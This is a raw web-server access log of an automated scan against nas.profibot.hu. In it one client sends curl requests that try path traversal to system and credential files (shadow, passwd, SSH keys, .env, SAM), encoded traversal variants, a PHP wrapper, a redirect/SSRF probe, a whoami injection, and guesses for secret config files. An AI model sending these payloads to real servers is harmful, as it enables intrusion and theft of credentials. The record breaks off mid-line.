- GET https nas.profibot.hu "/?template=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/flags/settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - - 403 - GET https nas.profibot.hu "/?read=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/ml/poisoned_dataset.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/crypto/swap_rules.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/commerce/api/index.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/wechatpay/env.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/deployments/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/pw-admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/email/env.mail" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/core/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/nlu.md" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:11 +0000] - 404 404 - GET https nas.profibot.hu "/azure/metadata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/node_modules/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/api/register" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/alexa_skill.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/helm/values.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/auth?next=http://..." [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 403 403 - GET https nas.profibot.hu "/.jupyter/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/vendor/onboarding_form.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/:2380" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/kibana" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/redteam/beacon.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 403 403 - GET https nas.profibot.hu "/.azure/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/graphql-playground" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/sepa/transfer_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 403 403 - GET https nas.profibot.hu "/.kube/secrets.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/mail/sendmail.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/regulations/gdpr_config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/adsbygoogle.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/etc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - 404 404 - GET https nas.profibot.hu "/compliance/merchant_review.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:12 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/reverse-proxy/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 403 403 - GET https nas.profibot.hu "/secrets/.gpg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/api/override_acl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/retention/email_retention_policy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/woocommerce/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/tools/admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/research/db/experiment.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/braintree.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - - 403 - GET https nas.profibot.hu "/proxy?url=http://example.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 403 403 - GET https nas.profibot.hu "/~/.mailrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/faceid/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/etc/tls/tls.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/applepay/config.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/kyc/verification_flow.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 403 403 - GET https nas.profibot.hu "/.nginx.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/recurrent/payment.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/shop/config.products.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/config/stripe.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - 404 404 - GET https nas.profibot.hu "/aws/metadata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:13 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/armnn/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/sentinelone/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/magento_version" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/dataset/face_vectors.npy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/latest.tar.gz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/admin/dashboard.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/debug/pprof/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postgresql/14/main/pg_hba.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/spacecraft/navigation.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/wp-includes/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/bci/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/netlify.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/order?id=4242" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/system/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/terraform.tfvars" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 403 403 - GET https nas.profibot.hu "/root/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/etc/dovecot/ssl.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mail/smtpd.relay.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 404 404 - GET https nas.profibot.hu "/updates/check.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:14 +0000] - 403 403 - GET https nas.profibot.hu "/.login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/auth/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afproc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/serveo.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/backup.tar" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/wp-register.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/null" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/certs/cert.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/odoo/addons/mail/data/mail_data.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 403 403 - GET https nas.profibot.hu "/~/.nail.rc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/aws.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/extensions/payment/paypal.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/variables.tf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/c2/server/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/admin.aspx" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 200 200 - GET https nas.profibot.hu "/?path=php://temp" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/siemens/step7/projdata.s7p" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:15 +0000] - 404 404 - GET https nas.profibot.hu "/admin_old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/envoy/envoy-sidecar.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/console?input=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/aws.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/qiwi/api.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/phpmyadmin/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/web3/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/etc/apache2/sites-available/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/webhooks/incoming/stripe.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/swagger-ui" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/base-station/env.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/props/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/braintree.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/ecommerce/settings.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/iap/apple/config.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/jwt-auth/v1/token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:16 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/loyalty/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 403 403 - GET https nas.profibot.hu "/.vscode/launch.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/gcp/mail-relay/relay.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/mailpile/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/qa_logs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/stack.yaml.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/etc/caddy/Caddyfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu "/config/broadcasting.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:25:17 +0000] - 404 404 - GET https nas.profibot.hu 